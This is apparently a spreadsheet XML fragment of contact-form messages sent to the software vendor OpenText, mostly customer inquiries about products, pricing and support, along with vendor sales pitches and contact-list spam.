    <t xml:space="preserve">Hello, We currently have OT MediaBin in-house and are looking to complement this with an Marketing Resource Management (MRM) tool that can help us better plan for, create, collaborate and review/approval ahead of storage. Do you have integration/partnership options for us? I was researching online and noted the below excerpt "Digital Asset Management for SAP Solutions enables effective global marketing by allowing the entire organization to share and repurpose assets, while complementing marketing resource management (MRM) systems to streamline overall marketing operations. Together, Digital Asset Management and MRM provide the tools necessary to manage costs and increase the effectiveness and performance of marketing programs." Are there any partner solutions to assist us on the MRM side of the house? Thank you! - Sarah </t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
I hope you are well, and enjoying the lovely weather this week!_x000D_
_x000D_
I’d like to speak with someone who is responsible for organising your CPD courses within the company._x000D_
_x000D_
I wanted to send them over an example of the work we do, what improvisation is, and a little bit more about Improv4Business._x000D_
_x000D_
Could you please refer me to the person in charge of CPD training?_x000D_
_x000D_
Thanks for your time,</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Madam or Sir,_x000D_
_x000D_
I own the domain _x000D_
_x000D_
www.magellan.blog_x000D_
_x000D_
.blog is a brand new domain extension._x000D_
_x000D_
If you are interested to buy this domain, I would be glad if you contact me._x000D_
_x000D_
Transfer via Sedo.com is possible._x000D_
_x000D_
Best regards from Berlin_x000D_
Tom Eisenlohr_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">GXS External Secure File Transfer - Network Connection Plug-proxies </t>
  </si>
  <si>
    <t>Can you tell me if the Brava reader features are included in the Desktop client? Thank you.</t>
  </si>
  <si>
    <t>I don't find Keyflow software in the products it was dismissed or replaced by other Software? Can you Help?</t>
  </si>
  <si>
    <t xml:space="preserve">I need a license to install another brook trout card in our server so that we can have 2 running with more channels.  I need this in writing_x000D_
_x000D_
thanks! </t>
  </si>
  <si>
    <t>I want to know what is the replacement for e-spreadsheet or birt spreadsheet if we use ihub\analytics designer._x000D_
Thanks,_x000D_
Savita</t>
  </si>
  <si>
    <t>PROGRAM AÇMAK İSTİYOM</t>
  </si>
  <si>
    <t>Interviews</t>
  </si>
  <si>
    <t xml:space="preserve">have some question regarding  open text viewer , that isnt working on windows 7 64 bit &amp; windows 10 . </t>
  </si>
  <si>
    <t>I am looking for the rightfax product. does it any local product distributor in HK? can you give the contact.</t>
  </si>
  <si>
    <t>We have a customer that already using OpenText. Currently they want us to maintain and enhance the OpenText system. Do you have consultant service in Singapore to support us on this project?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is George Polzer with Everymans.ai.  I am reaching out to see if I can assist your company with any A.I. machine learning product development and related marketing, channel building or sales acceleration work._x000D_
_x000D_
Everymans.ai (http://everymans.ai) is a boutique marketing and A.I. enabling consultancy.  We find and implement A.I. based solutions and execute marketing campaigns for immediate impact to gain a competitive edge._x000D_
_x000D_
- Media outreach, messaging &amp; content development_x000D_
- Tradeshow attendance &amp; demand generation_x000D_
- International business development &amp; launch strategies_x000D_
- Competitive research &amp; go-to-market execution_x000D_
- Sales &amp; marketing automation/alignment_x000D_
_x000D_
If interested in exploring my expertise, please don't hesitate to pick a time for a call using my online calendar link below or email me at george@everymans.ai with any questions._x000D_
_x000D_
http://meetme.so/georgepolzer_x000D_
_x000D_
I look forward to hearing from you._x000D_
_x000D_
Regards,_x000D_
George Polzer_x000D_
Principal Consultant, Founder_x000D_
+1 480.278.5232_x000D_
george@everymans.ai</t>
  </si>
  <si>
    <t xml:space="preserve">Guten Tag,_x000D_
_x000D_
für unser dem Konzern zugehörigen Unternehmen die SILONY Medical AG mit Sitz in der Schweiz suchen wir derzeit nach einem Anbieter für unser Vorhaben. Wir sind daher an einem Webinar zum Kennenlernen (Look &amp; Feel) Ihrer Lösung zur digitalen Rechungseingangsfreigabe-Workflow - inkl. (SAP ERP 6) angeschlossenem Archiv, interessiert._x000D_
_x000D_
Wir freuen uns deshalb über Ihre Kontaktaufnahme um einen Termin zu vereinbaren._x000D_
_x000D_
Viele Grüsse aus Prien,_x000D_
_x000D_
Carsten Rieck_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Support / purchase options for Brava Reader. </t>
  </si>
  <si>
    <t>Hello Team,  I would like to disclose some facts about your website. I hope you won’t mind spending only 2-3 minutes to have a look at the following lines: Get your website on Google’s Front Page search: We would like to have a discussion with you regarding the web promotion strategy for your website. We wish to work out a proposal to strengthen the online presence of your website, via, a strategically planned web promotion campaign. In today’s online era, you should be focusing on the new revolutionary ways of generating traffic. We were curious to know if you were aware that are a few issues bugging your website. Sorting out these will help you get the best returns out of your website. Your website seems to be attracting traffic, but this traffic is almost stagnant and limited, which affects potential sales as you move forward. Your website doesn't feature in Google's first search page for some of the major keywords in your niche, which affects visibility. Your website has been diagnosed with coding issues, which affects ranking. Your back links profile is not efficient enough to help your search engine visibility. Your website is currently not being properly promoted online, which is affecting your marketing strategy and goals Your presence in social media platform (Facebook, Twitter, etc.) is minimal. This is depriving you of a huge market of prospective referral clients. We excel in running promotional online marketing campaign for websites. We have a host of ethical services and techniques, which you can utilize to improve your website's performance. We could send you more details regarding your present website status; we would be glad to share “PRE SEO REPORT” or “WEBSITE ANALYSIS REPORT for FREE”.  Kindly revert back if you are interested, then we can send you more detail about package/action with special Offer and which will improve your sales &amp; website ranking too. Hope to get early response. Best Regards,  Susan Gibbs| Senior Sales Advisor _______________</t>
  </si>
  <si>
    <t>I used to see drawing with white back ground and black lines._x000D_
But after installed latest version, it changed black back ground and white lines._x000D_
Can I fix it? I want to see and print with white back ground and black lines.</t>
  </si>
  <si>
    <t xml:space="preserve">software will not install_x000D_
</t>
  </si>
  <si>
    <t>do you offer archival service to take content out of vignette VCM/VAP into defined location of cloud storage? (think we're on version 7.4 or 7.5...it is from 2008)</t>
  </si>
  <si>
    <t>I’ll need to submit a project charter internally here soon. Is it possible for you to email me a high-level/estimate cost to implement SaaS eDOCS?_x000D_
_x000D_
Basic requirements are:_x000D_
•	Four licenses required for Navigate_x000D_
•	Import contracts from current version 5.3.1 to SaaS version (approximately 11k) _x000D_
-	All contracts past to March 1, 2017_x000D_
-	All contracts post March 1, 2017 with NAV in prefix, Created by Carlos, James, or Kristie _x000D_
•	Metadata Search criteria needs to be on Title, Creator, Doc Number_x000D_
•	Include all eDOCS templates after March 1, 2017_x000D_
•	Document access control      _x000D_
•	Legal Document Management System including legal redlines             _x000D_
•	Archiving of historical data_x000D_
•	Electronic storage of documents</t>
  </si>
  <si>
    <t>PRIORITY - we have connection error on the CONTENT SERVER and we need to  run a screenshare immediately to check the LOG;_x000D_
Please contact us to shedule at the moment</t>
  </si>
  <si>
    <t>Hello,_x000D_
I would like to receive more specification about Brava!™ for_x000D_
Microsoft® SharePoint. _x000D_
_x000D_
How cost licenses_x000D_
Do I have to install the application on the SharePoint Server_x000D_
Thank you</t>
  </si>
  <si>
    <t>I would like to get a quote for your product OpenText Imaging. We are looking for a solution to enter the copy of the invoices into our SAP system. Our volume per month is around 1400 invoices_x000D_
_x000D_
Thank you in advance for your quick reply._x000D_
_x000D_
Regards,_x000D_
_x000D_
Gianina Rapeanu</t>
  </si>
  <si>
    <t>Will the Creating Accessible Documents from Start to Finish Webinar be recorded to watch at a later date?</t>
  </si>
  <si>
    <t>I have called everyday this week only to get a voicemail.  I have left two messages as well as sent one email via this form.  If I do not hear back from you in 24 hours I am crossing you off the list and calling your competitors.  Step up or step out.</t>
  </si>
  <si>
    <t>We need a quote for a client on the purchase of ProVision and Knowledge Exchange.  Please contact me at your earliest convenience for details as we need to move quickly.</t>
  </si>
  <si>
    <t>Code of Conduct policy link doesn't seem to be available. Can you please check?</t>
  </si>
  <si>
    <t>How do I code print to fax embedded codes into a Word 2013 template?</t>
  </si>
  <si>
    <t>pricing quote and info</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am contacting you to enquire about the possibility of using your eDocs DM software for our in-house legal department, located in Israel. _x000D_
From your website, I can see there is no representatives office in Israel, will this be a problem for the integration of your software on our system? If not, could we schedule some sort of a Skype demonstration, or perhaps you have some overview videos of the software?_x000D_
_x000D_
Many thanks,_x000D_
David</t>
  </si>
  <si>
    <t>Pricing for small business, 33 employees.</t>
  </si>
  <si>
    <t>Hi Team,  We have a $734K renewal coming up and out sales rep Michael North is no longer with the company.  Could someone please reach out to us soon so we can renew this service.</t>
  </si>
  <si>
    <t>SIBOS 2017 Toronto_x000D_
Greetings,_x000D_
In preparing for the upcoming Sibos 2017 trade show in Toronto, I am looking to introduce our company, TAG.  We are a Toronto, Canada based full service trade show house providing custom design, build, rental, as well as installation and dismantling services.  TAG has been providing these services for over 35 years.  _x000D_
Would you be so kind as to let me know who in your organization I should contact to discuss our capabilities further?_x000D_
Thank you,_x000D_
Ken</t>
  </si>
  <si>
    <t>Interested in Opentext as a potential provider for our first ECM rollout.</t>
  </si>
  <si>
    <t>Could not Connect to Server_x000D_
Content Server may be down or misconfigured._x000D_
Please try again. If the problem persists, contact your Content Server administrator._x000D_
Could not connect to server xxxx[xxx.xxx.xxx.xxx]:xxxx._x000D_
CONTRACT A124768</t>
  </si>
  <si>
    <t>We have a Hummingbird program and learned OpenText bought them back in 2006.  Does this mean our old Hummingbird is no longer supported?  As I understand, Hummingbird Connectivity Solutions have been renamed and rebranded to OpenText and they continue to be supported under the OpenText Connectivity Solutions family.  We have not paid our maintenance dues since 2006, but now want to make some changes.  How to proceed?</t>
  </si>
  <si>
    <t>I am interested in finding out more on the Documentum Capital Projects Express EDMS package</t>
  </si>
  <si>
    <t>Please  inform of the licenses and prices for Blazon for IBM (one production server and one non production server), if it is still available.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I see that you are looking for developers. I can provide you with any specific professionals you need._x000D_
I would like to discuss outsource solution. _x000D_
We are ready to connect with you at any convenient time. _x000D_
Feel free to contact me:_x000D_
T: +1 646 751 76 06 _x000D_
Email: Victoria.mishchenko@rexsoftinc.com_x000D_
_x000D_
Thank you for your time,_x000D_
Best regards, Victoria_x000D_
</t>
  </si>
  <si>
    <t>I need prices and buy licenses</t>
  </si>
  <si>
    <t xml:space="preserve">licence prices </t>
  </si>
  <si>
    <t>Enquiry on OpenText functionalities</t>
  </si>
  <si>
    <t>We have previously been the distributor of UNIFY's Turkey._x000D_
We also want to work with OPENTEXT as Distributor or VAR._x000D_
We are waiting for the price list of OPENTEXT products.</t>
  </si>
  <si>
    <t>Hi,_x000D_
Myself viren patel and I am pursuing software development course in mohawk college and I have my co-op term in September to December 2017.I am looking for co-op position if any available.</t>
  </si>
  <si>
    <t xml:space="preserve">Ticket #: 3005994_x000D_
I am chasing the progress of the mentioned ticket.  </t>
  </si>
  <si>
    <t>Good feedback for SAP Incident 249083 / 2017 OpenText VIM compatibility. Hanns was very proficient and thorough in all my dealing. Well done.</t>
  </si>
  <si>
    <t>I need more information on pricing for our fax option and I have questions about how it works.</t>
  </si>
  <si>
    <t xml:space="preserve">We are beings asked to install EoD client 13.7.6 and 13.8.7 on the same operating system instance. Is tis possible with the default installer? Is this a supported configuration? </t>
  </si>
  <si>
    <t xml:space="preserve">We are researching for a enterprise content cloud solution to replace our traditional storage of files via local file servers. I'm wondering if we could have a discussion to see if you would meet that need. </t>
  </si>
  <si>
    <t xml:space="preserve">Presently using eDOCS, probably not to its fullest extent.  Want to discuss our current version compared to newest version.  Would like to see if we have a representative that I can bounce ideas off of and figure out if this application is the right solution for us.  </t>
  </si>
  <si>
    <t xml:space="preserve">I now have a new computer and need to download the Brava product that I purchased. Can you help? </t>
  </si>
  <si>
    <t>Interested in specs and demo for rightfax</t>
  </si>
  <si>
    <t>Obtaining materials for OpenText Exstream, scheduling demo and possible engagement in near future.(EMAIL ONLY)</t>
  </si>
  <si>
    <t>Good afternoon - Booz Allen is currently pursuing a proposal with potential for operations and maintenance leveraging the OpenText platform. We would like to schedule a meeting in the next week at your Arlington location to determine steps to learn about the application and how we can approach the technical solution. We'd also like to request a NDA to be signed as part of this initiative. I look forward to your feedback and appreciate your time in advance. Thank you, Priscila Melendez</t>
  </si>
  <si>
    <t xml:space="preserve">Wir möchten gern DMS updaten und suchen Moment eine Alternativ zum iManage. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
My name is Paul Smith associated with InfoGlobalData, a Data Intelligence firm based out of Seattle, WA. _x000D_
_x000D_
Would you be interested acquiring a contact Information from All Small, Medium &amp; Large Corporates? _x000D_
_x000D_
List Include: _x000D_
•	HealthCare Companies, Financial Companies, Insurance Companies, Shipping Companies_x000D_
•	Institutions, Government Entities, Manufacturers, Large Legal Corporates, Mortgage Bankers_x000D_
•	Credit Unions, Regional Banks, Commercial Banks, Net Branch Brokers, Real Estate Companies_x000D_
•	Escrow and Title Companies, Lawyers, Accountants, Financial Advisors, Engineering Firms_x000D_
•	Construction, Transportation &amp; Logistics Companies, Publishers, Creator of E-Learning Materials, Event Industry_x000D_
•	Share Service Centers, BPO’s, Fabrication Companies_x000D_
•	Life Science Companies, Large Financial Companies, Pharmaceuticals, Auto Dealers_x000D_
•	Fortune 500 &amp; 1000 Companies, Public &amp; Private Organizations_x000D_
•	Investment Consultants, Wealth Management Companies, Research CRO’s &amp; SMO’s_x000D_
•	EHS, Sustainability, Environmental Companies, College &amp; Universities_x000D_
•	Medical Device Companies, Agricultural, Food &amp; Beverages Industry_x000D_
•	Dropbox, Zoho Doc, Share Point, Office 365, SohoDox, Blue Doc, Pinpoint, ScerIS Software Users List_x000D_
_x000D_
Geography: USA, Canada, UK, Europe, and Middle East &amp; Asia. _x000D_
_x000D_
If interested, do let me know what type of Target Audience/Job title/Geography you are looking for? _x000D_
_x000D_
Respectfully, _x000D_
_x000D_
Paul Smith _x000D_
InfoGlobalData _x000D_
pauls@infoglobaldata.com_x000D_
</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
Is there a way that you can upload multiple SKUs to the GXS catalog?? With UPC, Price, style #, etc. _x000D_
_x000D_
Thanks, _x000D_
Stephanie</t>
  </si>
  <si>
    <t>Need access to the support site.</t>
  </si>
  <si>
    <t>I am in the process to send out an RFI on behalf of our Legal team and their need of a Legal Case management system. Please provide with a contactperson who receive my RFI. Regards Else Marie Stangeland Kearney</t>
  </si>
  <si>
    <t>Wir sind bei der Auswahl eines ECM Systems mit Anbindung an Microsoft Dynamics NAV 2016</t>
  </si>
  <si>
    <t>We'd like to create a stock imagery library experience like istockphoto.com for our firm.</t>
  </si>
  <si>
    <t>We are issuing a RFI for a document management and workflow software and would like the name, email address, and telephone number of the person to who we should direct the RFI.</t>
  </si>
  <si>
    <t>I would like more information on your RightFax product.</t>
  </si>
  <si>
    <t xml:space="preserve">Need UPGRADE FIRSTCLASS 12. </t>
  </si>
  <si>
    <t>Need Life-cycle and versioning information regarding the product suite for Documentum 6.7 SP1</t>
  </si>
  <si>
    <t>I have a client looking to upgrade their rightfax server, I need someone to reach out to me to discuss and get pricing.  I have called several times and left a message with Devin and have yet to hear back from anyone.</t>
  </si>
  <si>
    <t>Today in the company we are evaluating Salesforce Enterprise Application Platform for some projects._x000D_
We have Opentext ECM installed on premise, and we need to know how to integrate this two solutions to work together._x000D_
We found the Opentext Extended ECM Platform in the Salesforce AppExchange, but there's some questions about how it works and if enables to integrate Salesforce (cloud) with our Opentext ECM on premise environment._x000D_
Besides that, we want to know abou the prices and costs aaround this solution._x000D_
Thanks for the support!_x000D_
Francis Santos</t>
  </si>
  <si>
    <t>I have a few questions for you:_x000D_
1) Is your solution is on premise, in the cloud or Saas?_x000D_
2) We are on Microsoft Azure cloud, is that OK to host your DAM?_x000D_
3) Do you offer a free trial period?_x000D_
4) What is your pricing structure?_x000D_
5) Do you have bank#financial institution clients?_x000D_
_x000D_
Thank you_x000D_
_x000D_
Philippe</t>
  </si>
  <si>
    <t>We have purchased a fax server from McKesson that did not have fax boards pre-installed.  We need to purchase a card to integrate RightFax with the McKesson software.  Currently we have a 30-day trial of RightFax 10.6 loaded.  We would like information on what fax board we need to purchase (part numbers, SKU, etc...)  Thank you.</t>
  </si>
  <si>
    <t>Prezados, bom dia._x000D_
_x000D_
Necessitamos de uma cotação para um Ambiente virtual (data rooms), que possuam pelo menos as seguintes funcionalidades:_x000D_
_x000D_
•	Histórico de acesso aos documentos_x000D_
•	Histórico de uploads de documentos_x000D_
•	Controle de confidencialidade e restrições a visualizações_x000D_
•	Controle de alterações _x000D_
•	Compartilhamento dos documentos_x000D_
•	Organização dos documentos por pastas_x000D_
•	Acesso e busca por qualquer navegador_x000D_
•	Suporte técnico 24h_x000D_
•	Capacidade ilimitada_x000D_
•	Possibilidade de visualização/alteração de documentos via smartphones e tablets_x000D_
•	Existe limite para a quantidade de pessoas que terão acesso ao sistema?_x000D_
•	Existe limitação de tamanho de arquivos para upload? _x000D_
_x000D_
Peço que nos envie o manual do sistema (para verificar a navegabilidade), as especificações técnicas e nos informe quais funcionalidades acima são atendidas pelo sistema de vocês e quais não são._x000D_
_x000D_
Qualquer dúvida estou à disposição._x000D_
_x000D_
Abraços</t>
  </si>
  <si>
    <t>Good Morning, My boss is wondering how she can gain access to open text?  Please let me know what we can do?  Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Responding to a Canadian Government RFP and would like to include Rightfax in Bell's solution mix. </t>
  </si>
  <si>
    <t>Information on Open text Invoice management Implementation on SQL SERVER 2016</t>
  </si>
  <si>
    <t>Information on open text Invoice management Implementation on SQL server 2016.</t>
  </si>
  <si>
    <t>Inquiry about the cost of Brava Reader Licence per user and up to 5 possibly. Thanks</t>
  </si>
  <si>
    <t>We would like to schedule a demo of your OpenText Extended ECM for Engineering suite.  We are looking at various applications which would support Enterprise level Engineering Document Management.</t>
  </si>
  <si>
    <t>Can you provide me a list of RightFax resellers in the Eastern PA or NJ area?  Thanks!_x000D_
_x000D_
Brenda</t>
  </si>
  <si>
    <t>We are looking for an Enterprise eFax solution. I need to get some information such as hardware and O/S requirements. As well as costs involved in both on premise and online versions.  Thanks</t>
  </si>
  <si>
    <t>Mogelijke interesse in Cordys als tool voor de procesmonitoring incl. uitval "reparaties"</t>
  </si>
  <si>
    <t>Bom dia. _x000D_
Gostaria de receber informações sobre o serviço de fax que vocês disponibilizam._x000D_
_x000D_
Fico no aguardo._x000D_
_x000D_
Grato._x000D_
_x000D_
Alvaro</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour , je suis un intégrateur GED  j'ai entraîne de monter une société au maroc spécialiste dans l'integration GED notamenet avec edocs DM , j'aimerai savoir ,Monsieur, les prix des licences edocs DM : dm server , dm web server , dm extension , rm administration tool._x000D_
Et merci bcp  </t>
  </si>
  <si>
    <t>We received your 'Meet Anthony' send out and we would like to know how you did it!</t>
  </si>
  <si>
    <t xml:space="preserve">I have updated my password then after am unable to access KC </t>
  </si>
  <si>
    <t>We are using SQLbase 12.0 and Team Developer 7.0. What would be minimum parameters for hardware and what OS are supported (versions of Windows, Linux)</t>
  </si>
  <si>
    <t>iHub Price Inquiry</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Je souhaite mettre en place une gestion documentaire au sein de mon entreprise. Je serais intéressé principalement pour sécuriser les documents, avoir un workflow, une signature électronique, le versionning des documents._x000D_
Merci de me recontacter pour en discuter et si possible avoir une démonstration._x000D_
Cordialement, Guillaume Lequint</t>
  </si>
  <si>
    <t>brava lisence</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
 	_x000D_
Greetings for the day!_x000D_
 _x000D_
My name is Marjorie, I would like to know if you’d be interested in purchasing Web Designing Industry potential customers lists._x000D_
 _x000D_
Reach your exact Target Criteria Applications for below mentioned prospects from Web Designing Industry It is an ideal solution for those direct marketers looking to develop relationships with businesses through their preferred channel across Australia, USA, UK &amp; Europe:_x000D_
_x000D_
Job Titles:_x000D_
•	Creative Media Professionals _x000D_
•	Web Design Developers_x000D_
•	Web Programmers_x000D_
•	Web Designers_x000D_
•	Graphic Designers_x000D_
•	Multimedia Professionals_x000D_
•	Animation Executive Managers_x000D_
•	Graphic Solution Developer_x000D_
•	Software Security Managers_x000D_
•	Engineers_x000D_
•	Product Managers_x000D_
•	Media Buyers &amp; Planners_x000D_
•	Creative and Art Director_x000D_
•	CEOs/CMOs/CTOs/Sales Executives_x000D_
•	Social Media Network Managers_x000D_
_x000D_
Our database comes with Contact Name, Job Title, Company Name, Physical Address, Phone No, Fax No, Email Address, Website and more._x000D_
 _x000D_
If you’re interested in using our database, then please reply me with your target criteria, so that I can get back to you with more details._x000D_
_x000D_
Target Criteria: _x000D_
 _x000D_
•	Industry you would like to reach_____x000D_
•	Job title you would like to reach_____x000D_
•	Location_____x000D_
_x000D_
We can also help you in email and data appending solutions which can help in holding back your lost customers._x000D_
_x000D_
I’d love to hear from you!_x000D_
_x000D_
Regards,_x000D_
_x000D_
Marjorie Lopez_x000D_
Marketing Executive_x000D_
US Data - European Data -  Email Append - Data Append - Technology Specific Data - Email Marketing._x000D_
12840 NE 21st Place, Bellevue, WA ,98005, United States_x000D_
_________________________________________x000D_
If you're not interested please reply subject line as "Leave Out”._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Dear All,_x000D_
_x000D_
It's more than 10 days we haven't got any release from Adient plants! _x000D_
Please make the necessary changes ASAP! _x000D_
_x000D_
Kind regards,_x000D_
Lidija</t>
  </si>
  <si>
    <t>Hello, I asked a question, if I put this product installed on the desktop, the server will call charges?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I'd like to connect with someone to learn more about your product offerings and potential business._x000D_
_x000D_
Best,_x000D_
Connor</t>
  </si>
  <si>
    <t>I need to find out the process, and the cost for a new customer to access our GXS / Open Text UPC catalog.  I don't think they currently subscribe to the catalog, and they asking about the cost.</t>
  </si>
  <si>
    <t>I manage a database and software development project for a US government customer. We will enter a phase of the project in Fiscal Year 2018 where we will be populating our database with information from numerous unstructured text sources. This will involve members of the project team manually reviewing the text documents, extracting the information we need to populate our database, and importing the data. I am doing research on text analysis/text mining solutions that might help my team accomplish this more efficiently. I would like to learn more about OpenText's suite of capabilities (specifically text mining/analytics) and get a general sense of pricing, if possible. I look forward to hearing from you._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jonathan</t>
  </si>
  <si>
    <t>Interested in a trial of eDocs DM for a single member of our Legal department</t>
  </si>
  <si>
    <t>We are a system integrator in Argentina and we have a potential customer for Aurasma VR technology.</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in efax services_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I hope you are the right person to discuss about the updated database of IT industry professionals._x000D_
_x000D_
We have complete contact details of:  CEO/MD/Chairman/Partners/Owners, Chief Information and Technology Officers, IT Directors, Data Centre Managers, Data Centre Facilities Managers and Engineers, Information Technology and Infrastructure Managers, Operation Directors, Network Managers, Network, Cabling and Communication, Engineers and Integrators, Storage Planners, Asset Managers, System Managers, System Security Managers, Finance Directors, Project Managers, Purchasing Managers/Corporate Buyers, Facilities/Premises Directors/Managers, Architects, Design/Build Consultants, Security Managers/Directors._x000D_
_x000D_
If your target audience is not mentioned above, kindly let me know._x000D_
_x000D_
Send me your target audience and geographical area to understand your needs better so that I can provide you few sample data, updated records and further details at no cost for your data evaluation. _x000D_
_x000D_
Looking forward to hear from you._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Scarlett Frost_x000D_
Marketing Manager</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon, _x000D_
_x000D_
Since 2001, the award winning SLSH greenBYTE program has provided over 4000 free computers to at risk kids and their families living in our community. We are able provide these free computers by receiving end-of-use computer donations from businesses and individuals. Computers that are suitable for donation are refurbished and updated with the latest Microsoft operating systems. The greenBYTE program also provides a lifetime warranty with every computer we donate. We also operate a small retail store providing computer systems, service maintenance, and parts to our clients all at an affordable price. The revenue generated from the store helps us offset the cost of providing free computers to at risk youth._x000D_
_x000D_
Our certified technicians are able to securely wipe hard drives and we have never had a data breach in our 16 year history.  If we are unable to use the computer equipment that is donated to us, we keep the parts that are in good standing and responsibly recycle the rest. Our goal is to divert the electronic waste that is thrown into landfills each year by refurbishing  computers to help bridge the “digital divide” in our community by giving them to low-income families. _x000D_
_x000D_
In order to for us to be able to continue to provide free computers to at risk kids, we kindly ask corporations for old computer donations, which is why we are reaching out to you. We proudly stand by our commitment and hope that you can contribute to our non-profit organization. Please visit us at our website if you would like to find out more information about us and how to donate._x000D_
_x000D_
Thank you so much and hope to be in touch with you soon._x000D_
_x000D_
Hannah-Rae Larmond_x000D_
Outsourcing Coordinator, St. Leonard’s Society of Hamilton’s greenBYTE_x000D_
(905) 387-8389_x000D_
35 King St. East, Unit #9 _x000D_
Hamilton, ON, L8N 4A9_x000D_
www.greenbyte.ca _x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am looking for more information about your report output management suite product. Is it on premise or in the cloud? Does this report product require Microsoft Sharepoint?_x000D_
_x000D_
Thank you,_x000D_
Katie Sixel</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I hope you are the right person to discuss about the updated database of IT industry professionals._x000D_
_x000D_
We have complete contact details of:_x000D_
_x000D_
CEO/MD/Chairman/Partners/Owners, Chief Information and Technology Officers, IT Directors, Data Centre Managers, Data Centre Facilities Managers and Engineers, Information Technology and Infrastructure Managers, Operation Directors, Network Managers, Network, Cabling and Communication, Engineers and Integrators, Storage Planners, Asset Managers, System Managers, System Security Managers, Finance Directors, Project Managers, Purchasing Managers/Corporate Buyers, Facilities/Premises Directors/Managers, Architects, Design/Build Consultants, Security Managers/Directors._x000D_
_x000D_
If your target audience is not mentioned above, kindly let me know._x000D_
_x000D_
Send me your target audience and geographical area to understand your needs better so that I can provide you few sample data, updated records and further details at no cost for your data evaluation. _x000D_
_x000D_
Looking forward to hear from you._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Scarlett Frost_x000D_
Marketing Manager_x000D_
</t>
  </si>
  <si>
    <t>Locked out of GXS, password was reset a short while ago. Neither new or old passwords can be logged in.</t>
  </si>
  <si>
    <t>Need to learn more about your product and possible purchase</t>
  </si>
  <si>
    <t>Bonjour_x000D_
_x000D_
Nous sommes une nouvelle société filiale du groupe Airbus, avec deux sites en France et aux Etats Unis, et nous sommes a la recherche d'outils pour amélorier et aider les process de comptabilité fournisseur et de saisie des factures. Open Text nous a été présenté rapidement a deux occcasions mais nous souhaiterions en savoir plus sur son fonctionnement, ses capacités, ses atouts et son coût et modèle de licence. Pourrions nous nous entretenir avec vous pour une démonstration/discussion de l'outil ?_x000D_
_x000D_
Merci beaucoup par avance_x000D_
Cordialement_x000D_
Mickael Cheron</t>
  </si>
  <si>
    <t>I need access to submit Service Tickets for support.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
Would you be interested in Contact Center User professional’s database with complete contact information like Email, Phone and Social Media Links for your lead generation or campaigning. _x000D_
_x000D_
We have Global 46 million B2B and 210 million B2C data for all industry verticals and more than 9500+ Global Technology vendors’ user base._x000D_
_x000D_
I can get you users of: Avaya, Cisco, Salesforce, Genesys, Mitel, ServiceNow, etc. _x000D_
_x000D_
Let me know your interest and I will assist you with more information like counts and pricing. Our clients include EMC, CA Technology, Brocade, RedHat, Polycom and many more._x000D_
_x000D_
Thanks,_x000D_
Rokia Bates_x000D_
</t>
  </si>
  <si>
    <t>need GXS catalogue account to work with retailer.</t>
  </si>
  <si>
    <t>I am interested in knowing how does your application work in a Google environment.</t>
  </si>
  <si>
    <t>The College of Computing at the Georgia Institute of Technology would like to invite you to our annual Fall Career Fair. Please provide us a company representative's contact information if you would like more information regarding the event.</t>
  </si>
  <si>
    <t>Would like to book a demo of the fax software to go over functionality and pricing before purchase.</t>
  </si>
  <si>
    <t>Look to replace our current fax solution.  Need something that will process 200K+fax's into FileNet system.</t>
  </si>
  <si>
    <t>Necessitamos de cotação para um treinamento conforme descrição abaixo:_x000D_
•	Vignette Portal – versão 8.1_x000D_
•	Vignette Content Management – versão 8.0 – SP2_x000D_
 _x000D_
O treinamento será em Recife para umas 10 pessoas._x000D_
Estou tentando contato via telefone e também por email, porém não estou obtendo qualquer tipo de retorno._x000D_
_x000D_
Poderiam nos ajudar?_x000D_
_x000D_
Obrigado,_x000D_
_x000D_
Marcelo Ramos</t>
  </si>
  <si>
    <t>Requesting a NFR License for an upcoming project where we will be archiving inbound/outbound faxes from Right fax</t>
  </si>
  <si>
    <t xml:space="preserve">I am wondering if you have a contact in the federal space as I am starting to look into a tool for workflow automation. Please let me know. Thanks _x000D_
_x000D_
Daniel Shapiro_x000D_
US Nuclear Regulatory Commission_x000D_
Office of the Chief Information Officer (OCIO)_x000D_
Daniel.Shapiro@nrc.gov_x000D_
Zachman Certified™ - Enterprise Architect Associate_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>On behalf of my client that I am helping select a digital asset management solution</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a contact who can provide me with more details on when enhancements are released for the letter application and how we would receive and install these enhancements to our application. </t>
  </si>
  <si>
    <t>Need to administer my Easylink system - URGENT</t>
  </si>
  <si>
    <t xml:space="preserve">Seeking online asset management solution for an international company. _x000D_
* Current space needs 7GB to 12GB to start_x000D_
* hoping for ability to apply roles/use levels to each user_x000D_
* hoping for ability to provide limited portals for key customers_x000D_
* Would like multi-language capability such as English, Chinese and Thai_x000D_
* just hosting media library for now, other features are bonus_x000D_
* we currently have space on Amazon AWS so could consider hosting ourselves, versus using existing cloud service_x000D_
I look forward to chatting with someone about options with OpenText. </t>
  </si>
  <si>
    <t>Dear All, _x000D_
Appreciate your support to provide us with quotation for Brava for SharePoint 2016, we are interested in deploying it at one of our big customers, _x000D_
_x000D_
Can you please also advise about the licensing model for the tool, as well as a write up for the features,_x000D_
